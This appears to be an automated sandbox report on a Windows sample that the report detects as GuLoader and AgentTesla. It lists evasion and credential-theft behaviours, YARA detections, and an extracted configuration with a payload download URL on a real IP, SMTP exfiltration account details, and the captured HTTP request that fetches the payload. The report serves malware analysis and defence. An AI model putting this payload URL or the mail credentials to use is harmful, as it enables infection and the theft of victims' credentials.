Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.generic.ml.10062.exe

Overview

General Information

Sample Name:SecuriteInfo.com.generic.ml.10062.exe
Analysis ID:634320
MD5:95050a1e0c7d4c57f62e26967b3b0bfd
SHA1:baa57d1bf6d8a41ba89c6d09bfc4ec2bc986830c
SHA256:458597ef6835136826411179f244673d5b2702e906bedb3e470786eb455d98ce
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SecuriteInfo.com.generic.ml.10062.exe (PID: 7996 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" MD5: 95050A1E0C7D4C57F62E26967B3B0BFD)
    • CasPol.exe (PID: 3968 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 984 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4028 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 1264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "SMTP", "SMTP Info": "droidyandex@centraldefiltros.clicui4cu2@@mail.centraldefiltros.cldroidyandexreports@centraldefiltros.cl"}
{"Payload URL": "http://2.56.57.22/yendexoriginwithoutfilter_rtSDhNF87.bin"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
        • 0x3116c:$s10: logins
        • 0x4aff4:$s11: credential
        • 0x1e1e:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
        • 0x28b7:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
        • 0x1f3f:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera
        00000005.00000000.62332198808.0000000000F00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Click to see the 3 entries
          No Sigma rule has matched
          Timestamp:192.168.11.202.56.57.2249763802018752 05/25/22-22:44:01.684322
          SID:2018752
          Source Port:49763
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://2.56.57.22/yendexoriginwithoutfilter_rtSDhNF87.bin"}
          Source: SecuriteInfo.com.generic.ml.10062.exe.7996.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "droidyandex@centraldefiltros.clicui4cu2@@mail.centraldefiltros.cldroidyandexreports@centraldefiltros.cl"}
          Source: SecuriteInfo.com.generic.ml.10062.exeVirustotal: Detection: 11%Perma Link
          Source: SecuriteInfo.com.generic.ml.10062.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: SecuriteInfo.com.generic.ml.10062.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.dr
          Source: Binary string: System.IO.FileSystem.Watcher.ni.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.1.dr
          Source: Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.dr
          Source: Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.dr
          Source: Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.dr
          Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Watcher\net6.0-windows-Release\System.IO.FileSystem.Watcher.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.1.dr
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B

          Networking

          barindex
          Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49763 -> 2.56.57.22:80
          Source: Malware configuration extractorURLs: http://2.56.57.22/yendexoriginwithoutfilter_rtSDhNF87.bin
          Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
          Source: global trafficHTTP traffic detected: GET /yendexoriginwithoutfilter_rtSDhNF87.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 2.56.57.22Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: unknownTCP traffic detected without corresponding DNS query: 2.56.57.22
          Source: CasPol.exe, 00000005.00000002.67212907111.000000001D58F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
          Source: CasPol.exe, 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000005.00000003.63392768852.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67188771993.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2.56.57.22/yendexoriginwithoutfilter_rtSDhNF87.bin
          Source: CasPol.exe, 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: folder-publicshare.png.1.drString found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: CasPol.exe, 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mglNPC.com
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://s2.symcb.com0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://subca.ocsp-certum.com01
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://subca.ocsp-certum.com02
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://subca.ocsp-certum.com05
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://sv.symcb.com/sv.crt0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://sv.symcd.com0&
          Source: avutil-54.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.drString found in binary or memory: http://www.avast.com0/
          Source: SecuriteInfo.com.generic.ml.10062.exeString found in binary or memory: http://www.certum.pl/CPS0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://www.nero.com
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://www.symauth.com/cps0(
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: http://www.symauth.com/rpa00
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: https://d.symcb.com/cps0%
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.drString found in binary or memory: https://d.symcb.com/rpa0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.1.drString found in binary or memory: https://github.com/dotnet/runtime
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.1.dr, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: CasPol.exe, 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: global trafficHTTP traffic detected: GET /yendexoriginwithoutfilter_rtSDhNF87.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 2.56.57.22Cache-Control: no-cache
